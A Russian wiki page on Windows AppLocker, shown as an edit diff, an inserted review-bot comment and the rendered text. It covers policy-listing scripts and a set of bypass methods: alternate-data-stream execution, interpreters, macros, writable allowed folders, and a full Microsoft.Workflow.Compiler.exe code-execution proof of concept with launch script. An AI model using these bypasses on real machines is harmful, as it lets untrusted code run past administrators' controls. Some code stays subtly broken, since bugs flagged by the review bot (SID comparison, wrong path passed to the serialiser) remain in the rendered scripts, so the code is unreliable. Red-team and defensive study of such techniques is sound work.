Applocker — различия между версиями

(Новая страница: «Applocker - функция управления приложениями и политиками по запуску программного обеспечени…»)
 
Строка 38: Строка 38:
  
 
** APPX
 
** APPX
 +
 +
= Общее =
 +
 +
== Получение политики (все юзеры) ==
 +
 +
<syntaxhighlight lang="powershell" line="1" enclose="div" style="overflow-x:scroll" >
 +
Get-ApplockerPolicy -effective
 +
</syntaxhighlight>
 +
 +
== Получение политики (все группы текущего пользователя) ==
 +
 +
<syntaxhighlight lang="powershell" line="1" enclose="div" style="overflow-x:scroll" >
 +
$a = Get-ApplockerPolicy -effective
 +

 +
$u = [Security.Principal.WindowsIdentity]::GetCurrent().User.Value
 +
$g = @([Security.Principal.WindowsIdentity]::GetCurrent().Groups)
 +
 +
Foreach ($x in @($a.rulecollections)){Foreach($y in @($x)){
 +
$f = 0;
 +
$v = $y.UserOrGroupSid.value;
 +
Foreach ($z in $g){
 +
if (($z.Value -eq $u) -or ($z.Value -eq $v)){
 +
$f= 1;
 +
};
 +
};
 +
  if ($f -eq 1){
 +
Write-Output $y.PathConditions;
 +
Write-Output $y.Action;
 +
}
 +
}}
 +
</syntaxhighlight>
 +
 +
Однострочник
 +
<syntaxhighlight lang="powershell" line="1" enclose="div" style="overflow-x:scroll" >
 +
$a = Get-ApplockerPolicy -effective;$u = [Security.Principal.WindowsIdentity]::GetCurrent().User.Value; $g = @([Security.Principal.WindowsIdentity]::GetCurrent().Groups);Foreach ($x in @($a.rulecollections)){Foreach($y in @($x)){$f = 0;$v = $y.UserOrGroupSid.value; Foreach ($z in $g){if (($z.Value -eq $u) -or ($z.Value -eq $v)){$f= 1;};};if ($f -eq 1){Write-Output $y.PathConditions;Write-Output $y.Action;};};};
 +
</syntaxhighlight>
 +
 +
= Обход AppLocker =
 +
 +
== Альтернативный канал ==
 +
 +
Например, если политика разрешат запуск из C:\logs то следующей командой мы можем сохранить файл в альтернативный канал и запустить его:
 +
 +
<syntaxhighlight lang="powershell" line="1" enclose="div" style="overflow-x:scroll" >
 +
type test.exe > C:\logs:test.exe
 +
wmic process call create '"C:\logs:test.exe"'
 +
</syntaxhighlight>
 +
 +
== Интерпретаторы ==
 +
 +
* python
 +
 +
* perl
 +
 +
* java
 +
 +
И так далее
 +
 +
== Макросы ворда ==
 +
 +
Макросы ворда VBS позволяют тоже обойти AppLocker и запустить произвольный код.
 +
 +
== Небезопасные политики ==
 +
 +
Требуется посмотреть список директорий, откуда можно запускать файлы, и проверить какие из директорий/файлов доступны для записи.
 +
 +
 +
== InstallUtil ==
 +
 +
См. [amsi]
 +
 +
== Microsoft.Workflow.Compiler.exe ==
 +
 +
 +
test.xml:
 +
<syntaxhighlight lang="xml" line="1" enclose="div" style="overflow-x:scroll; height: 300px" >
 +
<?xml version="1.0" encoding="utf-8"?>
 +
<CompilerInput xmlns:i="http://www.w3.org/2001/XMLSchema-instance" xmlns="http://schemas.datacontract.org/2004/07/Microsoft.Workflow.Compiler">
 +
<files xmlns:d2p1="http://schemas.microsoft.com/2003/10/Serialization/Arrays">
 +
<d2p1:string>test.xoml</d2p1:string>
 +
</files>
 +
<parameters xmlns:d2p1="http://schemas.datacontract.org/2004/07/System.Workflow.ComponentModel.Compiler">
 +
<assemblyNames xmlns:d3p1="http://schemas.microsoft.com/2003/10/Serialization/Arrays" xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler" />
 +
<compilerOptions i:nil="true" xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler" />
 +
<coreAssemblyFileName xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler"></coreAssemblyFileName>
 +
<embeddedResources xmlns:d3p1="http://schemas.microsoft.com/2003/10/Serialization/Arrays" xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler" />
 +
<evidence xmlns:d3p1="http://schemas.datacontract.org/2004/07/System.Security.Policy" i:nil="true" xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler" />
 +
<generateExecutable xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler">false</generateExecutable>
 +
<generateInMemory xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler">true</generateInMemory>
 +
<includeDebugInformation xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler">false</includeDebugInformation>
 +
<linkedResources xmlns:d3p1="http://schemas.microsoft.com/2003/10/Serialization/Arrays" xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler" />
 +
<mainClass i:nil="true" xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler" />
 +
<outputName xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler"></outputName>
 +
<tempFiles i:nil="true" xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler" />
 +
<treatWarningsAsErrors xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler">false</treatWarningsAsErrors>
 +
<warningLevel xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler">-1</warningLevel>
 +
<win32Resource i:nil="true" xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler" />
 +
<d2p1:checkTypes>false</d2p1:checkTypes>
 +
<d2p1:compileWithNoCode>false</d2p1:compileWithNoCode>
 +
<d2p1:compilerOptions i:nil="true" />
 +
<d2p1:generateCCU>false</d2p1:generateCCU>
 +
<d2p1:languageToUse>CSharp</d2p1:languageToUse>
 +
<d2p1:libraryPaths xmlns:d3p1="http://schemas.microsoft.com/2003/10/Serialization/Arrays" i:nil="true" />
 +
<d2p1:localAssembly xmlns:d3p1="http://schemas.datacontract.org/2004/07/System.Reflection" i:nil="true" />
 +
<d2p1:mtInfo i:nil="true" />
 +
<d2p1:userCodeCCUs xmlns:d3p1="http://schemas.datacontract.org/2004/07/System.CodeDom" i:nil="true" />
 +
</parameters>
 +
</CompilerInput>
 +
</syntaxhighlight>
 +
 +
 +
text.xoml:
 +
<syntaxhighlight lang="xml" line="1" enclose="div" style="overflow-x:scroll" >
 +
<SequentialWorkflowActivity x:Class="MyWorkflow" x:Name="MyWorkflow" xmlns:x="http://schemas.microsoft.com/winfx/2006/xaml" xmlns="http://schemas.microsoft.com/winfx/2006/xaml/workflow">
 +
    <CodeActivity x:Name="codeActivity1" />
 +
    <x:Code><![CDATA[
 +
    public class Foo : SequentialWorkflowActivity {
 +
    public Foo() {
 +
            Console.WriteLine("FOOO!!!!");
 +
        }
 +
    }
 +
    ]]></x:Code>
 +
</SequentialWorkflowActivity>
 +
</syntaxhighlight>
 +
 +
 +
Microsoft.Workflow.Compiler.exe соберет XML-проет и запустит его:
 +
<syntaxhighlight lang="powershell" line="1" enclose="div" style="overflow-x:scroll" >
 +
C:\Windows\Microsoft.Net\Framework64\v4.0.30319\Microsoft.Workflow.Compiler.exe test.xml results.xml
 +
</syntaxhighlight>
 +
 +
Полный фрагмент кода для автоматизации запуска:
 +
<syntaxhighlight lang="powershell" line="1" enclose="div" style="overflow-x:scroll;height:300px;" >
 +
function New-CompilerInputXml {
 +
<#
 +
.SYNOPSIS
 +
Creates a an XML file consisting of a serialized CompilerInput object.
 +
.DESCRIPTION
 +
New-CompilerInputXml creates an XML file consisting of compiler options. This file is required as the first argument for Microsoft.Workflow.Compiler.exe.
 +
.PARAMETER XOMLPath
 +
Specifies the path to the target XOML file. This can be a relative or absolute path. This path will be included in the resulting XML file that New-CompilerInputXml outputs.
 +
.PARAMETER OutputPath
 +
Specifies the path to which New-CompilerInputXml will save the serialized CompilerInput object.
 +
.EXAMPLE
 +
New-CompilerInputXml -XOMLPath C:\Test\foo.xoml -OutputPath test.xml
 +
Outputs a serialized CompilerInput object to test.xml and specifies a full path to a XOML assembly reference.
 +
.EXAMPLE
 +
New-CompilerInputXml -XOMLPath foo.xoml -OutputPath test.txt
 +
Outputs a serialized CompilerInput object to test.txt and specifies a XOML assembly reference using a relative path. Note that Microsoft.Workflow.Compiler.exe doesn't care about the extension supplied in the first argument.
 +
.OUTPUTS
 +
System.IO.FileInfo
 +
Outputs a FileInfo object to serve as confirmation that the resulting serialized XML wil was created.
 +
#>
 +
 +
    [OutputType([System.IO.FileInfo])]
 +
    param (
 +
        [String]
 +
        [ValidateNotNullOrEmpty()]
 +
        $XOMLPath = 'test.xoml',
 +
 +
        [Parameter(Mandatory = $True)]
 +
        [String]
 +
        [ValidateNotNullOrEmpty()]
 +
        $OutputPath
 +
    )
 +
 +
    # This assembly won't be loaded by default. We need to load
 +
    # it in order to get access to the WorkflowCompilerParameters class.
 +
    Add-Type -AssemblyName 'System.Workflow.ComponentModel'
 +
 +
    # This class contains the properties we need to specify for Microsoft.Workflow.Compiler.exe
 +
    $WFCompilerParams = New-Object -TypeName Workflow.ComponentModel.Compiler.WorkflowCompilerParameters
 +
 +
    # Necessary to get Microsoft.Workflow.Compiler.exe to call Assembly.Load(byte[])
 +
    $WFCompilerParams.GenerateInMemory = $True
 +
 +
    # Full path to Microsoft.Workflow.Compiler.exe that we will load and access a non-public method from
 +
    $WorkflowCompilerPath = [Runtime.InteropServices.RuntimeEnvironment]::GetRuntimeDirectory() + 'Microsoft.Workflow.Compiler.exe'
 +
 +
    # Load the assembly
 +
    $WFCAssembly = [Reflection.Assembly]::LoadFrom($WorkflowCompilerPath)
 +
 +
    # This is the helper method that will serialize the CompilerInput object to disk
 +
    $SerializeInputToWrapper = [Microsoft.Workflow.Compiler.CompilerWrapper].GetMethod('SerializeInputToWrapper', [Reflection.BindingFlags] 'NonPublic, Static')
 +
 +
    $TempFile = $SerializeInputToWrapper.Invoke($null, @([Workflow.ComponentModel.Compiler.WorkflowCompilerParameters] $WFCompilerParams, [String[]] @(,$OutputPath)))
 +
 +
    Move-Item $TempFile $OutputPath -PassThru
 +
}
 +
</syntaxhighlight>
 +
 +
Подробнее тут: https://posts.specterops.io/arbitrary-unsigned-code-execution-vector-in-microsoft-workflow-compiler-exe-3d9294bc5efb
 +
 +
 +
= Ссылки =
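Review bot: The group-matching loop in the new «Получение политики (все группы текущего пользователя)» script compares every token group SID against the user's own SID (`$z.Value -eq $u`), which can never be true, so rules that target the user directly are silently skipped; the check should be against the rule SID, `if (($v -eq $u) -or ($z.Value -eq $v)) { $f = 1 }`, and the same fix applies to the one-liner. In `New-CompilerInputXml` the serializer is invoked with `[String[]] @(,$OutputPath)` as the file list while `$XOMLPath` is never used, so the generated CompilerInput points at the output file instead of the XOML; it should read `[String[]] @(,$XOMLPath)`. The ADS example under «Альтернативный канал» is tagged as PowerShell but only works from cmd.exe: in PowerShell `type` is Get-Content and `>` re-encodes the stream as text, corrupting the PE. «Альтернативный канал» should be «альтернативный поток данных (ADS)», and «text.xoml» should be «test.xoml» to match the `<d2p1:string>test.xoml</d2p1:string>` entry.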

Версия 14:50, 16 марта 2022

AppLocker — функция Windows для управления запуском приложений: политика задаёт, какие файлы перечисленных ниже типов разрешено или запрещено запускать конкретным пользователям и группам.

Позволяет управлять:

  • Исполняемые файлы
    • EXE
    • COM
  • Скрипты
    • JS
    • PS1
    • VBS
    • CMD
    • BAT
  • Установочные файлы
    • MST
    • MSI
    • MSP
  • Библиотеки
    • DLL
    • OCX
  • Упакованные приложения
    • APPX

Общее

Получение эффективной политики (для всех пользователей)

# The effective policy is the local AppLocker policy merged with any domain
# (GPO) AppLocker policy applied to this machine, i.e. what is actually enforced.
Get-AppLockerPolicy -Effective

Получение правил, применимых к текущему пользователю (по его SID и группам)

 1 $a = Get-ApplockerPolicy -effective
 2 
 3 $u = [Security.Principal.WindowsIdentity]::GetCurrent().User.Value
 4 $g = @([Security.Principal.WindowsIdentity]::GetCurrent().Groups)
 5 
 6 Foreach ($x in @($a.rulecollections)){Foreach($y in @($x)){
 7 $f = 0;
 8 $v = $y.UserOrGroupSid.value; 
 9 Foreach ($z in $g){
10 if (($z.Value -eq $u) -or ($z.Value -eq $v)){
11 $f= 1;
12 };
13 };
14   if ($f -eq 1){
15 Write-Output $y.PathConditions;
16 Write-Output $y.Action;
17 }
18 }}

Однострочник

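# Same as the script above as a single line. A rule applies when its SID equals the user SID or one of the token group SIDs (the original compared group SIDs against the user SID, which never matches).
$a = Get-AppLockerPolicy -Effective; $u = [Security.Principal.WindowsIdentity]::GetCurrent().User.Value; $g = @([Security.Principal.WindowsIdentity]::GetCurrent().Groups | ForEach-Object { $_.Value }); foreach ($x in @($a.RuleCollections)) { foreach ($y in @($x)) { $v = $y.UserOrGroupSid.Value; if (($v -eq $u) -or ($g -contains $v)) { [PSCustomObject]@{ Collection = $x.RuleCollectionType; Enforcement = $x.EnforcementMode; Action = $y.Action; Name = $y.Name; Conditions = (@($y.PathConditions) + @($y.PublisherConditions) + @($y.HashConditions) | Where-Object { $_ }) } } } }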

Обход AppLocker

Альтернативные потоки данных (ADS)

Например, если политика разрешает запуск из C:\logs, а у пользователя есть право записи в этот каталог (поток создаётся на самом объекте каталога, а не на файле внутри него), то следующими командами из cmd.exe можно записать файл в альтернативный поток данных (ADS) каталога и запустить его:

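:: Run from cmd.exe, not PowerShell: there "type" is Get-Content and ">" re-encodes
:: the output as text, so the copied PE would be corrupted (in PowerShell use
:: Set-Content -Path C:\logs -Stream test.exe with the raw bytes instead).
:: The stream is attached to the directory object C:\logs itself, so the user
:: needs write access to that directory, and the policy must allow that path.
type test.exe > C:\logs:test.exe
:: wmic is deprecated and may be absent on current Windows builds; any launcher
:: that accepts a "dir:stream" path can be used in its place.
wmic process call create '"C:\logs:test.exe"'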

Интерпретаторы

  • python
  • perl
  • java

и т. п. AppLocker проверяет только сам исполняемый файл интерпретатора и файлы из собственных категорий скриптов (PS1, VBS, JS, CMD, BAT); если интерпретатор лежит в разрешённом каталоге, содержимое передаваемого ему скрипта не проверяется.

Макросы Word (VBA)

Макросы Word (VBA) также позволяют обойти AppLocker и выполнить произвольный код: макрос исполняется внутри разрешённого процесса Office и не относится ни к одной из контролируемых AppLocker категорий файлов, поэтому ограничивать макросы нужно политиками самого Office.

Небезопасные политики

Нужно получить список каталогов, из которых политика разрешает запуск (см. скрипты выше), и проверить, какие из этих каталогов и файлов доступны на запись текущему пользователю (icacls или Get-Acl). Стандартные правила AppLocker разрешают C:\Windows\* и C:\Program Files\*, а отдельные подкаталоги C:\Windows (например, C:\Windows\Tasks, C:\Windows\Temp) часто доступны на запись обычным пользователям — запись файла туда обходит такую политику.


InstallUtil

См. [amsi]

Microsoft.Workflow.Compiler.exe

test.xml:

<?xml version="1.0" encoding="utf-8"?>
<!-- Serialized CompilerInput passed as the first argument to Microsoft.Workflow.Compiler.exe.
     The New-CompilerInputXml function further down generates this file with the compiler's own serializer. -->
<CompilerInput xmlns:i="http://www.w3.org/2001/XMLSchema-instance" xmlns="http://schemas.datacontract.org/2004/07/Microsoft.Workflow.Compiler">
<!-- Source files to compile: the XOML below carries the C# that gets executed. -->
<files xmlns:d2p1="http://schemas.microsoft.com/2003/10/Serialization/Arrays">
<d2p1:string>test.xoml</d2p1:string>
</files>
<parameters xmlns:d2p1="http://schemas.datacontract.org/2004/07/System.Workflow.ComponentModel.Compiler">
<assemblyNames xmlns:d3p1="http://schemas.microsoft.com/2003/10/Serialization/Arrays" xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler" />
<compilerOptions i:nil="true" xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler" />
<coreAssemblyFileName xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler"></coreAssemblyFileName>
<embeddedResources xmlns:d3p1="http://schemas.microsoft.com/2003/10/Serialization/Arrays" xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler" />
<evidence xmlns:d3p1="http://schemas.datacontract.org/2004/07/System.Security.Policy" i:nil="true" xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler" />
<generateExecutable xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler">false</generateExecutable>
<!-- true makes the compiler load the compiled output via Assembly.Load(byte[])
     (see the comment in New-CompilerInputXml below). -->
<generateInMemory xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler">true</generateInMemory>
<includeDebugInformation xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler">false</includeDebugInformation>
<linkedResources xmlns:d3p1="http://schemas.microsoft.com/2003/10/Serialization/Arrays" xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler" />
<mainClass i:nil="true" xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler" />
<outputName xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler"></outputName>
<tempFiles i:nil="true" xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler" />
<treatWarningsAsErrors xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler">false</treatWarningsAsErrors>
<warningLevel xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler">-1</warningLevel>
<win32Resource i:nil="true" xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler" />
<d2p1:checkTypes>false</d2p1:checkTypes>
<d2p1:compileWithNoCode>false</d2p1:compileWithNoCode>
<d2p1:compilerOptions i:nil="true" />
<d2p1:generateCCU>false</d2p1:generateCCU>
<d2p1:languageToUse>CSharp</d2p1:languageToUse>
<d2p1:libraryPaths xmlns:d3p1="http://schemas.microsoft.com/2003/10/Serialization/Arrays" i:nil="true" />
<d2p1:localAssembly xmlns:d3p1="http://schemas.datacontract.org/2004/07/System.Reflection" i:nil="true" />
<d2p1:mtInfo i:nil="true" />
<d2p1:userCodeCCUs xmlns:d3p1="http://schemas.datacontract.org/2004/07/System.CodeDom" i:nil="true" />
</parameters>
</CompilerInput>


test.xoml (имя должно совпадать с записью в &lt;files&gt; выше):

<SequentialWorkflowActivity x:Class="MyWorkflow" x:Name="MyWorkflow" xmlns:x="http://schemas.microsoft.com/winfx/2006/xaml" xmlns="http://schemas.microsoft.com/winfx/2006/xaml/workflow">
    <CodeActivity x:Name="codeActivity1" />
    <x:Code><![CDATA[
    // C# compiled by Microsoft.Workflow.Compiler.exe. According to the linked
    // write-up the compiler loads the result and instantiates the compiled
    // activity types, so this constructor body runs during compilation itself;
    // the WriteLine is only the proof of execution.
    public class Foo : SequentialWorkflowActivity {
     public Foo() {
            Console.WriteLine("FOOO!!!!");
        }
    }
    ]]></x:Code>
</SequentialWorkflowActivity>


Microsoft.Workflow.Compiler.exe скомпилирует описанный в test.xml проект и выполнит код из test.xoml. Это подписанный Microsoft бинарник из C:\Windows, поэтому стандартные правила AppLocker (C:\Windows\*) его разрешают; второй аргумент — путь, куда компилятор запишет результаты:

# First argument: the serialized CompilerInput; second: where the compiler writes
# its results. Use ...\Framework\v4.0.30319\... for the 32-bit runtime.
& "C:\Windows\Microsoft.Net\Framework64\v4.0.30319\Microsoft.Workflow.Compiler.exe" test.xml results.xml

Функция, генерирующая входной XML (сериализованный CompilerInput) средствами самого компилятора — надёжнее, чем править файл выше вручную; пример вызова: New-CompilerInputXml -XOMLPath test.xoml -OutputPath test.xml

 1 function New-CompilerInputXml {
 2 <#
 3 .SYNOPSIS
 4 Creates a an XML file consisting of a serialized CompilerInput object.
 5 .DESCRIPTION
 6 New-CompilerInputXml creates an XML file consisting of compiler options. This file is required as the first argument for Microsoft.Workflow.Compiler.exe.
 7 .PARAMETER XOMLPath
 8 Specifies the path to the target XOML file. This can be a relative or absolute path. This path will be included in the resulting XML file that New-CompilerInputXml outputs.
 9 .PARAMETER OutputPath
10 Specifies the path to which New-CompilerInputXml will save the serialized CompilerInput object.
11 .EXAMPLE
12 New-CompilerInputXml -XOMLPath C:\Test\foo.xoml -OutputPath test.xml
13 Outputs a serialized CompilerInput object to test.xml and specifies a full path to a XOML assembly reference.
14 .EXAMPLE
15 New-CompilerInputXml -XOMLPath foo.xoml -OutputPath test.txt
16 Outputs a serialized CompilerInput object to test.txt and specifies a XOML assembly reference using a relative path. Note that Microsoft.Workflow.Compiler.exe doesn't care about the extension supplied in the first argument.
17 .OUTPUTS
18 System.IO.FileInfo
19 Outputs a FileInfo object to serve as confirmation that the resulting serialized XML wil was created.
20 #>
21 
22     [OutputType([System.IO.FileInfo])]
23     param (
24         [String]
25         [ValidateNotNullOrEmpty()]
26         $XOMLPath = 'test.xoml',
27 
28         [Parameter(Mandatory = $True)]
29         [String]
30         [ValidateNotNullOrEmpty()]
31         $OutputPath
32     )
33 
34     # This assembly won't be loaded by default. We need to load
35     # it in order to get access to the WorkflowCompilerParameters class.
36     Add-Type -AssemblyName 'System.Workflow.ComponentModel'
37 
38     # This class contains the properties we need to specify for Microsoft.Workflow.Compiler.exe
39     $WFCompilerParams = New-Object -TypeName Workflow.ComponentModel.Compiler.WorkflowCompilerParameters
40 
41     # Necessary to get Microsoft.Workflow.Compiler.exe to call Assembly.Load(byte[])
42     $WFCompilerParams.GenerateInMemory = $True
43 
44     # Full path to Microsoft.Workflow.Compiler.exe that we will load and access a non-public method from
45     $WorkflowCompilerPath = [Runtime.InteropServices.RuntimeEnvironment]::GetRuntimeDirectory() + 'Microsoft.Workflow.Compiler.exe'
46 
47     # Load the assembly
48     $WFCAssembly = [Reflection.Assembly]::LoadFrom($WorkflowCompilerPath)
49 
50     # This is the helper method that will serialize the CompilerInput object to disk
51     $SerializeInputToWrapper = [Microsoft.Workflow.Compiler.CompilerWrapper].GetMethod('SerializeInputToWrapper', [Reflection.BindingFlags] 'NonPublic, Static')
52 
53     $TempFile = $SerializeInputToWrapper.Invoke($null, @([Workflow.ComponentModel.Compiler.WorkflowCompilerParameters] $WFCompilerParams, [String[]] @(,$OutputPath)))
54 
55     Move-Item $TempFile $OutputPath -PassThru
56 }

Подробнее тут: https://posts.specterops.io/arbitrary-unsigned-code-execution-vector-in-microsoft-workflow-compiler-exe-3d9294bc5efb


Ссылки